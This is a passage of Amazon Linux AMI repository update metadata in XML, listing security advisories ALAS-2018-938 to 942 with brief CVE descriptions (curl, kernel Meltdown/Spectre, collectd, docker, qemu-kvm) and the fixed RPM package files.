release="22.55.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.70-22.55.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.70" release="22.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.70-22.55.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.70" release="22.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.70-22.55.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.70" release="22.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.70-22.55.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.70" release="22.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.70-22.55.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.70" release="22.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.70-22.55.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.70" release="22.55.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.9.70-22.55.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-938</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-938: medium priority package update for curl</title><issued date="2018-01-03 08:22:00" /><updated date="2018-01-03 22:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-8817:
The FTP wildcard function in curl and libcurl before 7.57.0 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) or possibly have unspecified other impact via a string that ends with an &#039;[&#039; character.
1515760:
CVE-2017-8817 curl: FTP wildcard out of bounds read
CVE-2017-8816:
The NTLM authentication feature in curl and libcurl before 7.57.0 on 32-bit platforms allows attackers to cause a denial of service (integer overflow and resultant buffer overflow, and application crash) or possibly have unspecified other impact via vectors involving long user and password fields.
1515757:
CVE-2017-8816 curl: NTLM buffer overflow via integer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8816" title="" id="CVE-2017-8816" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8817" title="" id="CVE-2017-8817" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcurl" version="7.53.1" release="13.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.53.1-13.80.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.53.1" release="13.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.53.1-13.80.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.53.1" release="13.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.53.1-13.80.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.53.1" release="13.80.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.53.1-13.80.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.53.1" release="13.80.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.53.1-13.80.amzn1.i686.rpm</filename></package><package name="curl" version="7.53.1" release="13.80.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.53.1-13.80.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.53.1" release="13.80.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.53.1-13.80.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.53.1" release="13.80.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.53.1-13.80.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-939</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-939: critical priority package update for kernel</title><issued date="2018-01-03 19:27:00" 
/><updated date="2018-01-16 01:10:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-5754:
An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions (a commonly used performance optimization). There are three primary variants of the issue, which differ in the way the speculative execution can be exploited. Variant CVE-2017-5754 relies on the fact that, on impacted microprocessors, during speculative execution of instructions that cause permission faults, the exception generation triggered by the faulting access is suppressed until the retirement of the whole instruction block. In combination with the fact that memory accesses may populate the cache even when the block is being dropped and never committed (executed), an unprivileged local attacker could use this flaw to read privileged (kernel space) memory by conducting targeted cache side-channel attacks. Note: CVE-2017-5754 affects Intel x86-64 microprocessors. AMD x86-64 microprocessors are not affected by this issue.
1519781:
CVE-2017-5754 hw: cpu: speculative execution permission faults handling
CVE-2017-5715:
An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions (a commonly used performance optimization). There are three primary variants of the issue, which differ in the way the speculative execution can be exploited. Variant CVE-2017-5715 triggers the speculative execution by utilizing branch target injection. It relies on the presence of a precisely-defined instruction sequence in the privileged code, as well as the fact that memory accesses may cause allocation into the microprocessor&#039;s data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to cross the syscall and guest/host boundaries and read privileged memory by conducting targeted cache side-channel attacks.
1519780:
CVE-2017-5715 hw: cpu: speculative execution branch target injection
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5715" title="" id="CVE-2017-5715" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5754" title="" id="CVE-2017-5754" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf" version="4.9.76" release="3.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.9.76-3.78.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.9.76" release="3.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.9.76-3.78.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.9.76" release="3.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.9.76-3.78.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.76" release="3.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.9.76-3.78.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.9.76" release="3.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.9.76-3.78.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.9.76" release="3.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.9.76-3.78.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.9.76" release="3.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.9.76-3.78.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.9.76" release="3.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.9.76-3.78.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.76" release="3.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.9.76-3.78.amzn1.x86_64.rpm</filename></package><package name="kernel" 
version="4.9.76" release="3.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.9.76-3.78.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.9.76" release="3.78.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.9.76-3.78.amzn1.i686.rpm</filename></package><package name="perf" version="4.9.76" release="3.78.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.9.76-3.78.amzn1.i686.rpm</filename></package><package name="kernel" version="4.9.76" release="3.78.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.9.76-3.78.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.9.76" release="3.78.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.9.76-3.78.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.9.76" release="3.78.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.9.76-3.78.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.9.76" release="3.78.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.9.76-3.78.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.9.76" release="3.78.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.9.76-3.78.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.9.76" release="3.78.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.9.76-3.78.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.9.76" release="3.78.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.9.76-3.78.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.9.76" release="3.78.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.9.76-3.78.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.9.76" release="3.78.amzn1" epoch="0" 
arch="noarch"><filename>Packages/kernel-doc-4.9.76-3.78.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-940</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-940: medium priority package update for collectd</title><issued date="2018-01-04 19:38:00" /><updated date="2018-01-05 20:47:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-16820:
The csnmp_read_table function in snmp.c in the SNMP plugin in collectd before 5.6.3 is susceptible to a double free in a certain error case, which could lead to a crash (or potentially have other impact).
1516447:
CVE-2017-16820 collectd: double free in csnmp_read_table function in snmp.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16820" title="" id="CVE-2017-16820" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="collectd-disk" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-disk-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-curl_xml" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-curl_xml-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-mcelog" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-mcelog-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-generic-jmx" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-generic-jmx-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-zookeeper" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-zookeeper-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-mysql" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-mysql-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-lua" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-lua-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-hugepages" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-hugepages-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-apache" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-apache-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-dbi" version="5.8.0" release="2.19.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/collectd-dbi-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-debuginfo" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-debuginfo-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-rrdtool" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-rrdtool-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-iptables" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-iptables-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-chrony" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-chrony-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-email" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-email-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="libcollectdclient-devel" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcollectdclient-devel-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-varnish" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-varnish-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-utils" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-utils-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-amqp" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-amqp-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-write_sensu" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-write_sensu-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-python" version="5.8.0" release="2.19.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/collectd-python-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-gmond" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-gmond-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-snmp_agent" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-snmp_agent-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-lvm" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-lvm-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-openldap" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-openldap-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-drbd" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-drbd-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-dns" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-dns-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-bind" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-bind-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-java" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-java-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-rrdcached" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-rrdcached-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-netlink" version="5.8.0" release="2.19.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/collectd-netlink-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-ipvs" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-ipvs-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-memcachec" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-memcachec-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-postgresql" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-postgresql-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="perl-Collectd" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Collectd-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-synproxy" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-synproxy-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-ipmi" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-ipmi-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-notify_email" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-notify_email-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-write_tsdb" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-write_tsdb-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-web" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-web-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-snmp" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-snmp-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="libcollectdclient" version="5.8.0" release="2.19.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/libcollectdclient-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-nginx" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-nginx-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-write_http" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-write_http-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-curl" version="5.8.0" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-curl-5.8.0-2.19.amzn1.x86_64.rpm</filename></package><package name="collectd-chrony" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-chrony-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-web" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-web-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-generic-jmx" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-generic-jmx-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-postgresql" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-postgresql-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-dns" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-dns-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-write_http" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-write_http-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-drbd" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-drbd-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-varnish" version="5.8.0" release="2.19.amzn1" epoch="0" 
arch="i686"><filename>Packages/collectd-varnish-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-lua" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-lua-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-email" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-email-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-synproxy" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-synproxy-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-ipvs" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-ipvs-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-write_tsdb" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-write_tsdb-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-debuginfo" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-debuginfo-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-utils" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-utils-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-rrdtool" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-rrdtool-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-gmond" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-gmond-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="libcollectdclient-devel" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/libcollectdclient-devel-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="libcollectdclient" version="5.8.0" release="2.19.amzn1" epoch="0" 
arch="i686"><filename>Packages/libcollectdclient-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-ipmi" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-ipmi-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-notify_email" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-notify_email-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-netlink" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-netlink-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-mysql" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-mysql-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-bind" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-bind-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-dbi" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-dbi-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-amqp" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-amqp-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-snmp_agent" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-snmp_agent-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-curl_xml" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-curl_xml-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-disk" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-disk-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-apache" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-apache-5.8.0-2.19.amzn1.i686.rpm</filename></package><package 
name="collectd-iptables" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-iptables-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-hugepages" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-hugepages-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-java" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-java-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-python" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-python-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-snmp" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-snmp-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-openldap" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-openldap-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-write_sensu" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-write_sensu-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-mcelog" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-mcelog-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-lvm" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-lvm-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-curl" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-curl-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="perl-Collectd" version="5.8.0" release="2.19.amzn1" epoch="0" 
arch="i686"><filename>Packages/perl-Collectd-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-zookeeper" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-zookeeper-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-rrdcached" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-rrdcached-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-nginx" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-nginx-5.8.0-2.19.amzn1.i686.rpm</filename></package><package name="collectd-memcachec" version="5.8.0" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-memcachec-5.8.0-2.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-941</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-941: medium priority package update for docker</title><issued date="2018-01-12 21:20:00" /><updated date="2018-01-15 19:01:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-14992:
Lack of content verification in Docker-CE (Also known as Moby) versions 1.12.6-0, 1.10.3, 17.03.0, 17.03.1, 17.03.2, 17.06.0, 17.06.1, 17.06.2, 17.09.0, and earlier allows a remote attacker to cause a Denial of Service via a crafted image layer payload, aka gzip bombing.
1510348:
CVE-2017-14992 docker: Lack of content verification
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14992" title="" id="CVE-2017-14992" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="docker-debuginfo" version="17.09.1ce" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-debuginfo-17.09.1ce-1.111.amzn1.x86_64.rpm</filename></package><package name="docker" version="17.09.1ce" release="1.111.amzn1" epoch="0" arch="x86_64"><filename>Packages/docker-17.09.1ce-1.111.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-942</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-942: important priority package update for qemu-kvm</title><issued date="2018-01-12 21:24:00" /><updated date="2018-01-15 19:04:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-5715:
An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions (a commonly used performance optimization). There are three primary variants of the issue which differ in the way the speculative execution can be exploited. Variant CVE-2017-5715 triggers the speculative execution by utilizing branch target injection. It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory accesses may cause allocation into the microprocessor&#039;s data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to cross the syscall and guest/host boundaries and read privileged memory by conducting targeted cache side-channel attacks.
1519780:
CVE-2017-5715 hw: cpu: speculative execution branch target injection
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5715" title="" id="CVE-2017-5715" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="qemu-kvm-tools" version="1.5.3" release="141.6.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-tools-1.5.3-141.6.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-common" version="1.5.3" release="141.6.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-common-1.5.3-141.6.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm-debuginfo" version="1.5.3" release="141.6.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-debuginfo-1.5.3-141.6.amzn1.x86_64.rpm</filename></package><package name="qemu-kvm" version="1.5.3" release="141.6.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-kvm-1.5.3-141.6.amzn1.x86_64.rpm</filename></package><package name="qemu-img" version="1.5.3" release="141.6.amzn1" epoch="10" arch="x86_64"><filename>Packages/qemu-img-1.5.3-141.6.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-943</id><title>Amazon Linux AMI 2014.03 - 